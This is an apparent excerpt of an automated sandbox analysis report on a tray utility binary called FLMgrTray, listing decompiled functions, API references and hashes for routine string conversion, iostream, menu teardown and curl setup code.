                                                                                        • Instruction ID: 2c9c479c12eb70fc069caa1feb3a41101d3d2e6fb6f62b4a8db935251fe8694a
                                                                                        • Opcode Fuzzy Hash: 480d4c06580df3adaeaa566ba0e6da7fb81f71a87ba200d86c275363ddd15303
                                                                                        • Instruction Fuzzy Hash: BD412332A002048FCB24CF6CDCC496DB7B9EFC5314B71462EE55697212DB70AA64CBA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 65%
                                                                                        			E00184770(void* __ecx, char* _a4, char _a8, int _a24, signed int _a28) {
                                                                                        				int _v8;
                                                                                        				char _v16;
                                                                                        				intOrPtr _v20;
                                                                                        				char* _v24;
                                                                                        				void* __ebx;
                                                                                        				void* __edi;
                                                                                        				void* __ebp;
                                                                                        				signed int _t26;
                                                                                        				char* _t29;
                                                                                        				int _t32;
                                                                                        				char* _t38;
                                                                                        				void* _t40;
                                                                                        				intOrPtr _t43;
                                                                                        				char* _t48;
                                                                                        				char _t51;
                                                                                        				intOrPtr _t55;
                                                                                        				char* _t56;
                                                                                        				signed int _t57;
                                                                                        				void* _t58;
                                                                                        				int _t63;
                                                                                        				char* _t64;
                                                                                        				signed int _t66;
                                                                                        
                                                                                        				_push(0xffffffff);
                                                                                        				_push(E0018E6F8);
                                                                                        				_push( *[fs:0x0]);
                                                                                        				_t26 =  *0x19d05c; // 0x2c80d730
                                                                                        				_push(_t26 ^ _t66);
                                                                                        				 *[fs:0x0] =  &_v16;
                                                                                        				_t29 = _a4;
                                                                                        				_v24 = _t29;
                                                                                        				_v20 = _t29;
                                                                                        				_t31 =  >=  ? _a8 :  &_a8;
                                                                                        				_v8 = 0;
                                                                                        				_t32 = WideCharToMultiByte(0xfde9, 0,  >=  ? _a8 :  &_a8, _a24, 0, 0, 0, 0);
                                                                                        				_t10 = _t32 + 1; // 0x1
                                                                                        				_t63 = _t10;
                                                                                        				_push(_t63);
                                                                                        				_t64 = E001755E6();
                                                                                        				memset(_t64, 0, _t63);
                                                                                        				_t36 =  >=  ? _a8 :  &_a8;
                                                                                        				WideCharToMultiByte(0xfde9, 0,  >=  ? _a8 :  &_a8, _a24, _t64, _t32, 0, 0);
                                                                                        				_t48 = _v24;
                                                                                        				_t38 = _t64;
                                                                                        				 *(_t48 + 0x10) = 0;
                                                                                        				_t17 =  &(_t38[1]); // 0x1
                                                                                        				_t56 = _t17;
                                                                                        				 *((intOrPtr*)(_t48 + 0x14)) = 0xf;
                                                                                        				 *_t48 = 0;
                                                                                        				do {
                                                                                        					_t51 =  *_t38;
                                                                                        					_t38 =  &(_t38[1]);
                                                                                        				} while (_t51 != 0);
                                                                                        				_t40 = E00163450(_t48, _t56, _t60, _t64, _t38 - _t56);
                                                                                        				_push(1);
                                                                                        				E00175733(_t40, _t64);
                                                                                        				_t57 = _a28;
                                                                                        				if(_t57 >= 8) {
                                                                                        					_t55 = _a8;
                                                                                        					_t58 = 2 + _t57 * 2;
                                                                                        					_t43 = _t55;
                                                                                        					if(_t58 >= 0x1000) {
                                                                                        						_t55 =  *((intOrPtr*)(_t55 - 4));
                                                                                        						_t58 = _t58 + 0x23;
                                                                                        						if(_t43 > 0x1f) {
                                                                                        							__imp___invalid_parameter_noinfo_noreturn();
                                                                                        						}
                                                                                        					}
                                                                                        					_push(_t58);
                                                                                        					E00175733(_t43, _t55);
                                                                                        				}
                                                                                        				 *[fs:0x0] = _v16;
                                                                                        				return _t48;
                                                                                        			}

























                                                                                        0x00184773
                                                                                        0x00184775
                                                                                        0x00184780
                                                                                        0x00184787
                                                                                        0x0018478e
                                                                                        0x00184792
                                                                                        0x00184798
                                                                                        0x0018479b
                                                                                        0x0018479e
                                                                                        0x001847ae
                                                                                        0x001847bd
                                                                                        0x001847cc
                                                                                        0x001847d0
                                                                                        0x001847d0
                                                                                        0x001847d3
                                                                                        0x001847da
                                                                                        0x001847df
                                                                                        0x001847ee
                                                                                        0x00184803
                                                                                        0x00184805
                                                                                        0x00184808
                                                                                        0x0018480a
                                                                                        0x00184811
                                                                                        0x00184811
                                                                                        0x00184814
                                                                                        0x0018481b
                                                                                        0x00184820
                                                                                        0x00184820
                                                                                        0x00184822
                                                                                        0x00184823
                                                                                        0x0018482d
                                                                                        0x00184832
                                                                                        0x00184835
                                                                                        0x0018483a
                                                                                        0x00184843
                                                                                        0x00184845
                                                                                        0x00184848
                                                                                        0x0018484f
                                                                                        0x00184857
                                                                                        0x00184859
                                                                                        0x0018485c
                                                                                        0x00184867
                                                                                        0x00184869
                                                                                        0x00184869
                                                                                        0x00184867
                                                                                        0x0018486f
                                                                                        0x00184871
                                                                                        0x00184876
                                                                                        0x0018487e
                                                                                        0x0018488c

                                                                                        APIs
                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000000,00000000), ref: 001847CC
                                                                                        • memset.VCRUNTIME140(00000000,00000000,00000001,00000001), ref: 001847DF
                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00184803
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00184869
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide$_invalid_parameter_noinfo_noreturnmemset
                                                                                        • String ID:
                                                                                        • API String ID: 2536929686-0
                                                                                        • Opcode ID: a17dd849b9d8f028719f2229d2a8a4cf9cb0fed3c812cb4dd31f87738574ed68
                                                                                        • Instruction ID: 68c552bc6bab8cdf15bac8b8dc01703a730abee3d131a2cac4d7d761dbfacfdb
                                                                                        • Opcode Fuzzy Hash: a17dd849b9d8f028719f2229d2a8a4cf9cb0fed3c812cb4dd31f87738574ed68
                                                                                        • Instruction Fuzzy Hash: 2031D531600245AFEB10EF58DC85FDE77A9EB49714F108225F914EB680D774EA148BA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 65%
                                                                                        			E00184650(void* __ecx, char* _a4, char _a8, int _a24, signed int _a28) {
                                                                                        				int _v8;
                                                                                        				char _v16;
                                                                                        				intOrPtr _v20;
                                                                                        				char* _v24;
                                                                                        				void* __ebx;
                                                                                        				void* __edi;
                                                                                        				void* __ebp;
                                                                                        				signed int _t26;
                                                                                        				char* _t29;
                                                                                        				int _t32;
                                                                                        				char* _t38;
                                                                                        				void* _t40;
                                                                                        				intOrPtr _t43;
                                                                                        				char* _t48;
                                                                                        				char _t51;
                                                                                        				intOrPtr _t55;
                                                                                        				char* _t56;
                                                                                        				signed int _t57;
                                                                                        				void* _t58;
                                                                                        				int _t63;
                                                                                        				char* _t64;
                                                                                        				signed int _t66;
                                                                                        
                                                                                        				_push(0xffffffff);
                                                                                        				_push(E0018E6F8);
                                                                                        				_push( *[fs:0x0]);
                                                                                        				_t26 =  *0x19d05c; // 0x2c80d730
                                                                                        				_push(_t26 ^ _t66);
                                                                                        				 *[fs:0x0] =  &_v16;
                                                                                        				_t29 = _a4;
                                                                                        				_v24 = _t29;
                                                                                        				_v20 = _t29;
                                                                                        				_t31 =  >=  ? _a8 :  &_a8;
                                                                                        				_v8 = 0;
                                                                                        				_t32 = WideCharToMultiByte(0, 0,  >=  ? _a8 :  &_a8, _a24, 0, 0, 0, 0);
                                                                                        				_t10 = _t32 + 1; // 0x1
                                                                                        				_t63 = _t10;
                                                                                        				_push(_t63);
                                                                                        				_t64 = E001755E6();
                                                                                        				memset(_t64, 0, _t63);
                                                                                        				_t36 =  >=  ? _a8 :  &_a8;
                                                                                        				WideCharToMultiByte(0, 0,  >=  ? _a8 :  &_a8, _a24, _t64, _t32, 0, 0);
                                                                                        				_t48 = _v24;
                                                                                        				_t38 = _t64;
                                                                                        				 *(_t48 + 0x10) = 0;
                                                                                        				_t17 =  &(_t38[1]); // 0x1
                                                                                        				_t56 = _t17;
                                                                                        				 *((intOrPtr*)(_t48 + 0x14)) = 0xf;
                                                                                        				 *_t48 = 0;
                                                                                        				do {
                                                                                        					_t51 =  *_t38;
                                                                                        					_t38 =  &(_t38[1]);
                                                                                        				} while (_t51 != 0);
                                                                                        				_t40 = E00163450(_t48, _t56, _t60, _t64, _t38 - _t56);
                                                                                        				_push(1);
                                                                                        				E00175733(_t40, _t64);
                                                                                        				_t57 = _a28;
                                                                                        				if(_t57 >= 8) {
                                                                                        					_t55 = _a8;
                                                                                        					_t58 = 2 + _t57 * 2;
                                                                                        					_t43 = _t55;
                                                                                        					if(_t58 >= 0x1000) {
                                                                                        						_t55 =  *((intOrPtr*)(_t55 - 4));
                                                                                        						_t58 = _t58 + 0x23;
                                                                                        						if(_t43 > 0x1f) {
                                                                                        							__imp___invalid_parameter_noinfo_noreturn();
                                                                                        						}
                                                                                        					}
                                                                                        					_push(_t58);
                                                                                        					E00175733(_t43, _t55);
                                                                                        				}
                                                                                        				 *[fs:0x0] = _v16;
                                                                                        				return _t48;
                                                                                        			}

























                                                                                        0x00184653
                                                                                        0x00184655
                                                                                        0x00184660
                                                                                        0x00184667
                                                                                        0x0018466e
                                                                                        0x00184672
                                                                                        0x00184678
                                                                                        0x0018467b
                                                                                        0x0018467e
                                                                                        0x0018468e
                                                                                        0x0018469d
                                                                                        0x001846a9
                                                                                        0x001846ad
                                                                                        0x001846ad
                                                                                        0x001846b0
                                                                                        0x001846b7
                                                                                        0x001846bc
                                                                                        0x001846cb
                                                                                        0x001846dd
                                                                                        0x001846df
                                                                                        0x001846e2
                                                                                        0x001846e4
                                                                                        0x001846eb
                                                                                        0x001846eb
                                                                                        0x001846ee
                                                                                        0x001846f5
                                                                                        0x001846f8
                                                                                        0x001846f8
                                                                                        0x001846fa
                                                                                        0x001846fb
                                                                                        0x00184705
                                                                                        0x0018470a
                                                                                        0x0018470d
                                                                                        0x00184712
                                                                                        0x0018471b
                                                                                        0x0018471d
                                                                                        0x00184720
                                                                                        0x00184727
                                                                                        0x0018472f
                                                                                        0x00184731
                                                                                        0x00184734
                                                                                        0x0018473f
                                                                                        0x00184741
                                                                                        0x00184741
                                                                                        0x0018473f
                                                                                        0x00184747
                                                                                        0x00184749
                                                                                        0x0018474e
                                                                                        0x00184756
                                                                                        0x00184764

                                                                                        APIs
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,013C1C88,?,00000000,00000000,00000000,00000000), ref: 001846A9
                                                                                        • memset.VCRUNTIME140(00000000,00000000,00000001,00000001), ref: 001846BC
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,013C1C88,?,00000000,00000000,00000000,00000000), ref: 001846DD
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00184741
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide$_invalid_parameter_noinfo_noreturnmemset
                                                                                        • String ID:
                                                                                        • API String ID: 2536929686-0
                                                                                        • Opcode ID: 196cb46d3f1193983fa9b6b79c33f6344746bdffd3a4637cb290dc7eedfb13fd
                                                                                        • Instruction ID: 8b35fdfdabeac0f2a7db38e8879441be353e1b4a43ea6aca4eae455fb9b58fde
                                                                                        • Opcode Fuzzy Hash: 196cb46d3f1193983fa9b6b79c33f6344746bdffd3a4637cb290dc7eedfb13fd
                                                                                        • Instruction Fuzzy Hash: C531D531600245AFDB10DF18CC85FDE77A9EB49714F208225F918DB6C0D774EA04CBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(2C80D730,?,?,2C80D730,?,?,2C80D730,00000001), ref: 00184F4C
                                                                                          • Part of subcall function 00184DA0: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXXZ.MSVCP140(?,2C80D730,2C80D730), ref: 00184DB6
                                                                                          • Part of subcall function 00184DA0: _get_stream_buffer_pointers.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000000,00000000,00000001), ref: 00184DE5
                                                                                        • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(2C80D730,00000000,00000001,2C80D730,?,?,2C80D730,00000001), ref: 00184F68
                                                                                          • Part of subcall function 001848B0: ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,2C80D730,?,2C80D730,?,?,?,?,?,00000000,0018E731,000000FF,?,00184F7B), ref: 001848DD
                                                                                          • Part of subcall function 001848B0: ??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 001848F8
                                                                                          • Part of subcall function 001848B0: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140 ref: 0018491F
                                                                                          • Part of subcall function 001848B0: ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?), ref: 0018493F
                                                                                          • Part of subcall function 001848B0: std::_Facet_Register.LIBCPMT ref: 00184958
                                                                                          • Part of subcall function 001848B0: ??1_Lockit@std@@QAE@XZ.MSVCP140 ref: 00184973
                                                                                        • ?always_noconv@codecvt_base@std@@QBE_NXZ.MSVCP140 ref: 00184F82
                                                                                        • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXXZ.MSVCP140 ref: 00184F9A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: D@std@@@std@@U?$char_traits@$Init@?$basic_streambuf@Lockit@std@@$??0_??1_?always_noconv@codecvt_base@std@@?getloc@?$basic_streambuf@Bid@locale@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@_get_stream_buffer_pointersstd::_
                                                                                        • String ID:
                                                                                        • API String ID: 3911317180-0
                                                                                        • Opcode ID: c384fe81962c53c90051813ad895d7ccd265b7f9d2f9bd9b4463a347fdd53e96
                                                                                        • Instruction ID: ad4cc0217e2b9cdec31aefe793abecb875766e6a0fd1e2f7e7346087f50b6680
                                                                                        • Opcode Fuzzy Hash: c384fe81962c53c90051813ad895d7ccd265b7f9d2f9bd9b4463a347fdd53e96
                                                                                        • Instruction Fuzzy Hash: 7021B075604205DFDB14EF58D844B6EB7E9EB48710F00412EF902D7790EB759A10CBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(2C80D730), ref: 001849F2
                                                                                        • ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140(00000005,00000000,00000000,2C80D730), ref: 00184A10
                                                                                        • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140 ref: 00184A3A
                                                                                        • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXXZ.MSVCP140 ref: 00184A54
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_ios@??0?$basic_ostream@??0?$basic_streambuf@D@std@@@1@_Init@?$basic_streambuf@V?$basic_streambuf@
                                                                                        • String ID:
                                                                                        • API String ID: 1632471084-0
                                                                                        • Opcode ID: daf0145147c6d868b23b977c89e2b8d7b6069adb4832f2a0ef5b301b94f7e63f
                                                                                        • Instruction ID: c34800a063a786c36a8202af986525e881e6e88d6ccc7cc761089e5e461cb648
                                                                                        • Opcode Fuzzy Hash: daf0145147c6d868b23b977c89e2b8d7b6069adb4832f2a0ef5b301b94f7e63f
                                                                                        • Instruction Fuzzy Hash: 04217CB8600755EFCB10CF18D948B8AFBF4FB08714F10451EE80697B90D7B5AA44CB91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ?DestroyMenu@CMenuWnd@DuiLib@@SAXXZ.DUILIB(?,?,?,?,2C80D730,?,?,?,0018CAC0,000000FF), ref: 00162616
                                                                                        • ??1CMenuWnd@DuiLib@@QAE@XZ.DUILIB(?,?,?,?,2C80D730,?,?,?,0018CAC0,000000FF), ref: 00162628
                                                                                        • ??1CTrayIcon@DuiLib@@QAE@XZ.DUILIB(?,?,?,?,2C80D730,?,?,?,0018CAC0,000000FF), ref: 0016264C
                                                                                        • ??1WindowImplBase@DuiLib@@UAE@XZ.DUILIB(?,?,?,?,2C80D730,?,?,?,0018CAC0,000000FF), ref: 00162654
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: Lib@@$MenuWnd@$Base@DestroyIcon@ImplMenu@TrayWindow
                                                                                        • String ID:
                                                                                        • API String ID: 1410178875-0
                                                                                        • Opcode ID: 4630adaabff84ecb9bda22c26035d983577dbdac6c9adc03885d967b1b3f26ac
                                                                                        • Instruction ID: 5d094eebae4bc188be10daa6c150d7e0684d37e7967dd2a3510d365c379ae3f9
                                                                                        • Opcode Fuzzy Hash: 4630adaabff84ecb9bda22c26035d983577dbdac6c9adc03885d967b1b3f26ac
                                                                                        • Instruction Fuzzy Hash: 98118F71504B449FC321EF28DD09B5ABBE5FB04714F00462EE84A97B91DBB86A16CF94
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ?DestroyMenu@CMenuWnd@DuiLib@@SAXXZ.DUILIB(?,?,?,?,2C80D730,?,?,?,0018CA80,000000FF), ref: 001624EF
                                                                                        • ??1CMenuWnd@DuiLib@@QAE@XZ.DUILIB(?,?,?,?,2C80D730,?,?,?,0018CA80,000000FF), ref: 00162501
                                                                                        • ??1CTrayIcon@DuiLib@@QAE@XZ.DUILIB(?,?,?,?,2C80D730,?,?,?,0018CA80,000000FF), ref: 00162525
                                                                                        • ??1WindowImplBase@DuiLib@@UAE@XZ.DUILIB(?,?,?,?,2C80D730,?,?,?,0018CA80,000000FF), ref: 0016252D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: Lib@@$MenuWnd@$Base@DestroyIcon@ImplMenu@TrayWindow
                                                                                        • String ID:
                                                                                        • API String ID: 1410178875-0
                                                                                        • Opcode ID: 84d8d49814310063d85933d3098d1b51c8a711ec9edd2b41c4fbbae91f83b221
                                                                                        • Instruction ID: f2d707b301b52cf9e5814ed9a2e7c2c31f9e54021d8e50d30f21d0b33131fa49
                                                                                        • Opcode Fuzzy Hash: 84d8d49814310063d85933d3098d1b51c8a711ec9edd2b41c4fbbae91f83b221
                                                                                        • Instruction Fuzzy Hash: D0016971508B44DFC320EF29D90875ABBF5FB48710F110A2EE85A97B91DB786A06CF94
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 72%
                                                                                        			E00175B31(intOrPtr* _a4) {
                                                                                        				intOrPtr _t7;
                                                                                        				void* _t8;
                                                                                        				intOrPtr _t13;
                                                                                        				intOrPtr _t14;
                                                                                        				signed int _t15;
                                                                                        				void* _t20;
                                                                                        				void* _t22;
                                                                                        				signed int _t23;
                                                                                        
                                                                                        				EnterCriticalSection(0x19dc18);
                                                                                        				_t13 =  *0x19d064; // 0x80000002
                                                                                        				_t14 = _t13 + 1;
                                                                                        				 *0x19d064 = _t14;
                                                                                        				 *_a4 = _t14;
                                                                                        				_t15 =  *0x19dc48; // 0x0
                                                                                        				_t7 =  *0x19d064; // 0x80000002
                                                                                        				 *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t15 * 4)) + 4)) = _t7;
                                                                                        				LeaveCriticalSection(0x19dc18);
                                                                                        				_t22 = _t20;
                                                                                        				_t8 =  *0x19dc34; // 0x0
                                                                                        				if(_t8 != 0) {
                                                                                        					SetEvent(_t8);
                                                                                        					return ResetEvent( *0x19dc34);
                                                                                        				} else {
                                                                                        					_t23 =  *0x19d05c; // 0x2c80d730
                                                                                        					asm("ror esi, cl");
                                                                                        					 *0x18f530(0x19dc30, _t22);
                                                                                        					return  *(_t23 ^  *0x19dc3c)();
                                                                                        				}
                                                                                        			}











                                                                                        0x00175b3b
                                                                                        0x00175b41
                                                                                        0x00175b4a
                                                                                        0x00175b4b
                                                                                        0x00175b52
                                                                                        0x00175b5a
                                                                                        0x00175b63
                                                                                        0x00175b68
                                                                                        0x00175b6e
                                                                                        0x00175b74
                                                                                        0x00175bcd
                                                                                        0x00175bd4
                                                                                        0x00175bfc
                                                                                        0x00175c0e
                                                                                        0x00175bd6
                                                                                        0x00175bd7
                                                                                        0x00175be8
                                                                                        0x00175bf1
                                                                                        0x00175bfa
                                                                                        0x00175bfa

                                                                                        APIs
                                                                                        • EnterCriticalSection.KERNEL32(0019DC18,00000000,?,00182050,0019DFA8,0018ED00), ref: 00175B3B
                                                                                        • LeaveCriticalSection.KERNEL32(0019DC18,?,00182050,0019DFA8,0018ED00), ref: 00175B6E
                                                                                        • SetEvent.KERNEL32(00000000,0019DFA8,0018ED00), ref: 00175BFC
                                                                                        • ResetEvent.KERNEL32 ref: 00175C08
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalEventSection$EnterLeaveReset
                                                                                        • String ID:
                                                                                        • API String ID: 3553466030-0
                                                                                        • Opcode ID: f152ed3806a95119d7096e1322a1565d4d8cbd9f91afeb3aadfdad73e6df43af
                                                                                        • Instruction ID: 9c2a8a07ba912f07effe0bc85e189adff912d02a9a805a29bea196097c414232
                                                                                        • Opcode Fuzzy Hash: f152ed3806a95119d7096e1322a1565d4d8cbd9f91afeb3aadfdad73e6df43af
                                                                                        • Instruction Fuzzy Hash: D0016D31614624DFCB049F68FE4895977A9FB49711B85402EFA06D7B20CFB06E82CBD4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • curl_easy_setopt.LIBCURL(?,00002734,00000000), ref: 001672CF
                                                                                        • curl_easy_setopt.LIBCURL(?,00000050,00000001,?,00002734,00000000), ref: 001672D6
                                                                                        • curl_easy_setopt.LIBCURL(?,0000002F,00000000,?,00000050,00000001,?,00002734,00000000), ref: 001672DD
                                                                                        • curl_easy_setopt.LIBCURL(?,0000002C,00000000,?,0000002F,00000000,?,00000050,00000001,?,00002734,00000000), ref: 001672E4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: curl_easy_setopt
                                                                                        • String ID:
                                                                                        • API String ID: 2879491745-0
                                                                                        • Opcode ID: f6ac7da2ca168d42f7367a434cef436152ca4ee3bbf149c0548e50ca2bed0eb1
                                                                                        • Instruction ID: f29d7aaef25d04dab690981d0df45aa0547b262880ccc3b0e0ea24c7f8529e2e
                                                                                        • Opcode Fuzzy Hash: f6ac7da2ca168d42f7367a434cef436152ca4ee3bbf149c0548e50ca2bed0eb1
                                                                                        • Instruction Fuzzy Hash: D3F0823174021477E1205A565C86F6BBF2CDB86F74F10002AF6086F2C0C69168018AE5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 55%
                                                                                        			E001733E0(intOrPtr* __ecx, intOrPtr _a4) {
                                                                                        				intOrPtr _v8;
                                                                                        				char _v16;
                                                                                        				signed int _v20;
                                                                                        				signed int _v24;
                                                                                        				char _v44;
                                                                                        				intOrPtr _v48;
                                                                                        				char _v68;
                                                                                        				void* __ebx;
                                                                                        				void* __ebp;
                                                                                        				signed int _t27;
                                                                                        				signed int _t28;
                                                                                        				intOrPtr* _t30;
                                                                                        				intOrPtr _t38;
                                                                                        				intOrPtr _t41;
                                                                                        				intOrPtr _t45;
                                                                                        				intOrPtr* _t47;
                                                                                        				intOrPtr _t53;
                                                                                        				intOrPtr _t54;
                                                                                        				intOrPtr* _t55;
                                                                                        				intOrPtr _t56;
                                                                                        				signed int _t57;
                                                                                        				void* _t58;
                                                                                        				void* _t59;
                                                                                        				intOrPtr* _t61;
                                                                                        				intOrPtr* _t64;
                                                                                        				signed int _t66;
                                                                                        				void* _t67;
                                                                                        				void* _t68;
